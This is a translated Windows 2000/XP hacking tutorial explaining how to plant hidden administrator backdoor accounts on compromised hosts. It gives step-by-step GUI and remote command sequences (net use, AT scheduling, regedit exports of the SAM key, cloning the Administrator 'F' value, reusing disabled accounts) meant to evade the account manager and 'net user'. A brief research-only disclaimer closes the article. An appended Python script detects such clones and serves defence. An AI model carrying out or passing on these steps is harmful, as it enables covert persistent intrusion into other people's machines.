Source: http://wmjie.51.net/swords/

I. How to build a hidden super user through the graphical interface (for the local machine, or for a broiler, that is a compromised host, whose 3389 terminal service is open)

The author I mentioned above has a very good method, but it is more complicated and needs PSU.exe (a program that runs a process as the SYSTEM user), so PSU.exe has to be uploaded to the broiler first. The method I describe here does not need PSU.exe, because Windows 2000 has two registry editors, regedit.exe and regedt32.exe (in XP they are actually one program, and a key's permissions are changed through "Permissions" in its right-click menu). Everyone is familiar with regedit.exe, but it cannot set permissions on registry keys; the greatest advantage of regedt32.exe is that it can. The NT/2000/XP account information is under the registry key HKEY_LOCAL_MACHINE\SAM\SAM, but other users have no right to view what is inside, so I first use regedt32.exe to give myself "Full Control" on the SAM key. That makes the information under the SAM key readable and writable. The specific steps are as follows:

1. Suppose we are on a broiler with the terminal service open and have the super user Administrator. First create an account, Hacker$, at the command line or in the account manager. Here I create it at the command line:
   net user Hacker$ 1234 /add
2. Click "Start" -> "Run", enter regedt32.exe and press Enter to start regedt32.exe, as shown in figure T001.
3. Select the HKEY_LOCAL_MACHINE\SAM\SAM key and click "Permissions"; the window shown in figure T002 pops up. Click "Add" and add the account you are logged in with to the security list. Here I am logged in as Administrator, so I add Administrator and set its permission to "Full Control". One thing needs explaining: it is best to add the account you are logged in with, or the group it belongs to, rather than modifying the original accounts or groups, otherwise a series of unnecessary problems will follow.
Once the hidden super user has been built, come back here and delete the account you added.
4. Click "Start" -> "Run", enter regedit.exe and press Enter to start the registry editor regedit.exe. Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Hacker$, as shown in figure T003.
5. Export the items Hacker$, 00000409 and 000001F4 to Hacker.reg, 409.reg and 1F4.reg respectively, and edit the exported files with Notepad: copy the value of the key "F" under the item 000001F4, which corresponds to the super user, over the value of "F" under the item 00000409, which corresponds to Hacker$, and then merge 00000409 into Hacker.reg. The edited Hacker.reg is shown in figure T004.
6. Press F5 in the window to refresh, then use File -> Import Registry File to import the modified Hacker.reg into the registry.
8. At this point the hidden super user Hacker$ is built; close regedit.exe. Then, in the regedt32.exe window, restore the permissions of the HKEY_LOCAL_MACHINE\SAM\SAM key (that is, delete the Administrator account you added there).
9. Note: after the hidden super user is built, the user Hacker$ cannot be seen in the account manager, nor with the "net user" command at the command line. But once the super user is built you cannot change its password: if you change Hacker$'s password with the net user command, this hidden super user will show up in the account manager and cannot be deleted.

II. How to create a hidden super user remotely from the command line

This uses the AT command: the scheduled task generated by AT runs as SYSTEM, so the PSU.exe program is not needed. To be able to use the AT command, the Schedule service must be running on the broiler; if it is not, it can be started remotely with the tool netsvc.exe or sc.exe from Xiao Rong's Liuguang (Fluxay), and of course other methods can also start the Schedule service. For the command line you can use various connection methods, such as connecting to MSSQL's port 1433 with SQLEXEC, or getting a cmdshell through Telnet, as long as you have permission to run the AT command.

1. First find a broiler; how to find one is not what I discuss here. Assume we have found a broiler with the super user Administrator and the password 12345678, and we now start building a hidden super user on it remotely from the command line. (The host in the example is one on my local area network; I have changed its IP address to 13.50.97.238 so as not to harass a real Internet address.)
2. First establish a connection with the broiler. The command is:
   net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"
3. Use the AT command to create a user on the broiler (if the Schedule service is not started, start it remotely with Xiao Rong's netsvc.exe or sc.exe):
   at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user Hacker$ 1234 /add
   Because the user name created this way contains a $, "net user" at the command line will not display this user, but it can still be seen in the account manager.
4. Export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users with an AT command:
   at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e Hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
   The key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ must end with the trailing backslash. If necessary, enclose the command in quotation marks: "c:\winnt\regedit.exe /e Hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\".
5. Download Hacker.reg from the broiler to this machine and edit it with Notepad. The command is:
   copy \\13.50.97.238\admin$
   (The editing method was introduced in the graphical-interface part and is not repeated here.)
6. Then copy the edited Hacker.reg back to the broiler:
   copy c:\Hacker.reg \\13.50.97.238\admin$\system32\Hacker1.reg
   The above operations are shown in the figure.
7. Check the broiler's time:
   net time \\13.50.97.238
   then use the AT command to delete the user Hacker$:
   at \\13.50.97.238 13:40 net user Hacker$ /del
8. Connect to the broiler with the account Hacker$:
   net use \\13.50.97.238\ipc$ "1234" /user:"Hacker$"
   If it cannot connect, refer to the explanation.
11. Then verify that the user Hacker$ has read, write and delete permissions; if you are still not reassured, you can also verify that it can create other accounts.
12. From figures 1, 2 and 3 it can be determined that the user Hacker$ has super user privileges, because the account I originally built with the AT command was an ordinary user, but it now has remote read, write and delete permissions.

III. What if the broiler's 3389 terminal service is not open and I do not want to use the command line?

In this case you can still build a hidden super user on the broiler through the graphical interface. Because regedit.exe and regedt32.exe can connect to a network registry, you can use regedt32.exe to set permissions on the remote host's registry keys and regedit.exe to edit the remote registry. The account manager also has a function for connecting to another computer, so you can use it to create and delete accounts on the remote host. The specific steps are similar to the above, so I will not say much, except that the speed is unbearable. But there are two preconditions:
1. First use net use with /user:"super user name" to establish a connection with the remote host; only then can regedit.exe, regedt32.exe and the account manager connect to it.
2. The remote host must have the Remote Registry service running (if it is not running, you can start it remotely, because you have the super user's password).

IV. Building a hidden super user from a disabled account

We can use a disabled user on the broiler to build a hidden super user.
The method is as follows:
1. First look carefully at which users are disabled. In general, some administrators disable Guest for security, and of course other accounts may be disabled as well. Under the graphical interface this is very easy, since a disabled account shows a red cross; at the command line I have not thought of a good way, and can only run "net user <user name>" one user at a time to see whether that user is disabled.
2. Here we assume that the user Hacker has been disabled by the administrator. First use Xiao Rong's cloning program CA.exe to clone the disabled user Hacker into a super user (after cloning, the user Hacker is activated automatically):
   ca.exe \\broiler-ip Administrator <super user password> Hacker <Hacker password>
3. If you now have a cmdshell, whether through the Telnet service or from connecting to MSSQL's default port 1433 with SQLEXEC, just enter the command:
   net user Hacker /active:no
   and the user Hacker is disabled again (at least on the surface). Of course you can use any other disabled user instead of Hacker.
4. Now, if you look at the users in the account manager under the graphical interface, you will find that the user Hacker is disabled. But is it really? Connect to the broiler with this disabled user and see whether the connection succeeds:
   net use \\broiler-ip\ipc$ "Hacker password" /user:"Hacker"
   I can tell you that after many tests it succeeds, and the account is a super user.
5. What if there is no cmdshell? You can disable the user Hacker with AT; the command format is:
   at \\broiler-ip <time> net user Hacker /active:no
6. Principle: I cannot explain the specific, deeper principle, only the simplest version. First try disabling the super user Administrator in the account manager under the graphical interface: a dialog will certainly pop up forbidding you to continue disabling the super user Administrator. In cloning, Hacker's "F" key in the registry is replaced by the super user Administrator's "F" key, so Hacker has the super user's permissions; but because Hacker's "C" key in the registry is still the original "C" key, Hacker remains disabled, while its super user permissions are not disabled. So a disabled user can still connect to the broiler, and still has super user permissions. I do not understand it well myself; just take it this way.

V. Notes
1. After the hidden super user is built, this user cannot be seen in the account manager or at the command line, but it exists.
2. After the hidden super user is built, its password cannot be changed again, because once the password is changed this hidden super user is exposed in the account manager and cannot be deleted.
3. When testing this on your own machine, it is best to back up the machine's "System State" with the system's backup tool first, mainly to back up the registry, because once during my tests the account manager showed no users and no groups at all, although they still existed. Fortunately I had a backup, heh heh.
The SAM key is the most sensitive part of the system.
4. This method has been tested on 2000/XP and has not been tested on NT.

This method is for research purposes only; do not use it to cause damage. If using this method causes serious consequences, they are borne by the user; the author is not responsible for any of them. 3389xp.bat is the complete source code for this article; its function is to open 3389 on XP and build a hidden account.
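The "F" clone the article relies on leaves a consistency check for defenders: the RID stored inside a cloned account's "F" value is the donor's (500 for Administrator), not the RID in its own key name. The following Python is an added example, not part of the original article or of 3389xp.bat; it scans a regedit export of the Users key for that mismatch and for the "$"-suffixed names the article says "net user" hides. The RID offset inside "F" and the @=hex(<rid>): form of the Names entries follow the commonly documented SAM export layout, and the sample export is constructed.

```python
import re
import struct

# Offset of the RID field inside a SAM user "F" value, per the commonly documented layout.
F_RID_OFFSET = 0x30
USERS_PATH = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
# A user key (named by its RID in hex) followed by its "F" value; the hex may continue over '\'-ended lines.
F_VALUE = re.compile(r'^\[' + re.escape(USERS_PATH) + r'\\([0-9A-Fa-f]{8})\]\s*\n'
                     r'"F"=hex:((?:[0-9A-Fa-f]{2}|[,\\\s])+)', re.M)
# A Names\<account> key; regedit writes the account's RID as the type of the default value, e.g. @=hex(1f4):
NAME_RID = re.compile(r'^\[' + re.escape(USERS_PATH) + r'\\Names\\(.+)\]\s*\n'
                      r'@=hex\(([0-9A-Fa-f]+)\):', re.M)

def reg_hex(data):  # render bytes as regedit /e does: comma-separated hex on '\'-continued lines
    chunks = [",".join("%02x" % b for b in data[i:i + 20]) for i in range(0, len(data), 20)]
    return "hex:" + ",\\\n  ".join(chunks)

# Constructed sample export: Administrator (RID 500), Guest (501) and a Hacker$ account (RID 1001)
# whose "F" value was overwritten with Administrator's. Each F is zero-padded except its RID field.
SAMPLE_REG = "Windows Registry Editor Version 5.00\n\n" + "".join(
    '[%s\\%08X]\n"F"=%s\n\n' % (USERS_PATH, rid, reg_hex(struct.pack("<%dxI28x" % F_RID_OFFSET, f_rid)))
    for rid, f_rid in ((500, 500), (501, 501), (1001, 500))) + "".join(
    "[%s\\Names\\%s]\n@=hex(%x):\n\n" % (USERS_PATH, name, rid)
    for name, rid in (("Administrator", 500), ("Guest", 501), ("Hacker$", 1001)))

def parse_sam_export(text):
    """Return ({RID from key name: F bytes}, {account name: RID}) from a regedit export."""
    users = {int(k, 16): bytes.fromhex(re.sub(r"[^0-9A-Fa-f]", "", h)) for k, h in F_VALUE.findall(text)}
    names = {n: int(r, 16) for n, r in NAME_RID.findall(text)}
    return users, names

def find_suspicious_accounts(text):
    """Flag accounts whose F value carries another account's RID (a clone) or whose name ends in '$'."""
    users, names = parse_sam_export(text)
    by_rid = {rid: name for name, rid in names.items()}
    findings = []
    for key_rid, f in sorted(users.items()):
        f_rid = struct.unpack_from("<I", f, F_RID_OFFSET)[0]
        name = by_rid.get(key_rid, "?")
        if f_rid != key_rid:
            findings.append((name, key_rid, "F holds RID %d (%s): cloned" % (f_rid, by_rid.get(f_rid, "?"))))
        if name.endswith("$"):
            findings.append((name, key_rid, "name ends in '$': hidden from 'net user'"))
    return findings

if __name__ == "__main__":
    for name, rid, why in find_suspicious_accounts(SAMPLE_REG):
        print("%-14s RID %-5d %s" % (name, rid, why))
```

On a real machine the same check can be run over an export taken with regedit /e of the Users key, or against the SAM hive from a "System State" backup like the one the article recommends.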